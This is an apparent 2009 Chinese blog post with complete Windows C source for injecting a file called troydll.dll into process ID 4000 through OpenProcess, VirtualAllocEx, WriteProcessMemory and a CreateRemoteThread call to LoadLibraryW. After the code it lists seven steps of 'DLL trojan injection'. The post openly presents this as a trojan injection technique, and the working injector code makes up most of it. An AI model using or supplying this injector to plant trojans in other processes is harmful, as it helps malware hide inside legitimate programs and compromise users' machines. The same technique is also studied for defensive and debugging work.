将d盘根目录下的troydll.dll插入到ID为4000的进程中

//将d盘根目录下的troydll.dll插入到ID为4000的进程中:
#include <windows.h>
#include <stdlib.h>
#include <stdio.h>
PDWORD pdwThreadId;
HANDLE hRemoteThread, hRemoteProcess;
DWORD fdwCreate, dwStackSize, dwRemoteProcessId;
PWSTR pszLibFileRemote=NULL;

void main(int argc,char **argv)
{
 int iReturnCode;
 char lpDllFullPathName[MAX_PATH];
 WCHAR pszLibFileName[MAX_PATH]={0};
 dwRemoteProcessId = 4000;
 strcpy(lpDllFullPathName, "d:\\troydll.dll");
 iReturnCode = MultiByteToWideChar(CP_ACP, MB_ERR_INVALID_CHARS,
  lpDllFullPathName, strlen(lpDllFullPathName),pszLibFileName, MAX_PATH);  //将DLL文件全路径的ANSI码转换成UNICODE码
 //打开远程进程
hRemoteProcess = OpenProcess(PROCESS_CREATE_THREAD | //允许创建线程
  PROCESS_VM_OPERATION | //允许VM操作
  PROCESS_VM_WRITE, //允许VM写
  FALSE, dwRemoteProcessId );
 
 int cb = (1 + lstrlenW(pszLibFileName)) * sizeof(WCHAR); //计算DLL路径名需要的内存空间
 pszLibFileRemote = (PWSTR) VirtualAllocEx( hRemoteProcess, NULL, cb, MEM_COMMIT, PAGE_READWRITE);

 //将DLL的路径名复制到远程进程的内存空间 pszLibFileName = "d:\\troydll.dll"
 iReturnCode = WriteProcessMemory(hRemoteProcess, pszLibFileRemote, (PVOID) pszLibFileName, cb, NULL);

 //计算LoadLibraryW的入口地址
 PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE)
   GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW");

 //启动远程线程,通过远程线程调用用户的DLL文件
 hRemoteThread = CreateRemoteThread( hRemoteProcess, NULL, 0, pfnStartAddr, pszLibFileRemote, 0, NULL);

 //等待远程线程退出
 WaitForSingleObject(hRemoteThread, INFINITE);
 //清场处理
 if (pszLibFileRemote != NULL)
 {
  VirtualFreeEx(hRemoteProcess, pszLibFileRemote, 0, MEM_RELEASE);
 }
 if (hRemoteThread != NULL)
 {
  CloseHandle(hRemoteThread );
 }
 if (hRemoteProcess!= NULL)
 {
  CloseHandle(hRemoteProcess);
 }
}

}

  从DLL木马注入程序的源代码中我们可以分析出DLL木马注入的一般步骤为:

  (1)取得宿主进程(即要注入木马的进程)的进程ID dwRemoteProcessId;

  (2)取得DLL的完全路径,并将其转换为宽字符模式pszLibFileName;

  (3)利用Windows API OpenProcess打开宿主进程,应该开启下列选项:

  a.PROCESS_CREATE_THREAD:允许在宿主进程中创建线程;

  b.PROCESS_VM_OPERATION:允许对宿主进程中进行VM操作;

  c.PROCESS_VM_WRITE:允许对宿主进程进行VM写。

  (4)利用Windows API VirtualAllocEx函数在远程线程的VM中分配DLL完整路径宽字符所需的存储空间,并利用Windows API WriteProcessMemory函数将完整路径写入该存储空间;

  (5)利用Windows API GetProcAddress取得Kernel32模块中LoadLibraryW函数的地址,这个函数将作为随后将启动的远程线程的入口函数;

  (6)利用Windows API CreateRemoteThread启动远程线程,将LoadLibraryW的地址作为远程线程的入口函数地址,将宿主进程里被分配空间中存储的完整DLL路径作为线程入口函数的参数以另其启动指定的DLL;

  (7)清理现场。

posted @ 2009-09-06 12:44  熊健  阅读(388)  评论(0编辑  收藏  举报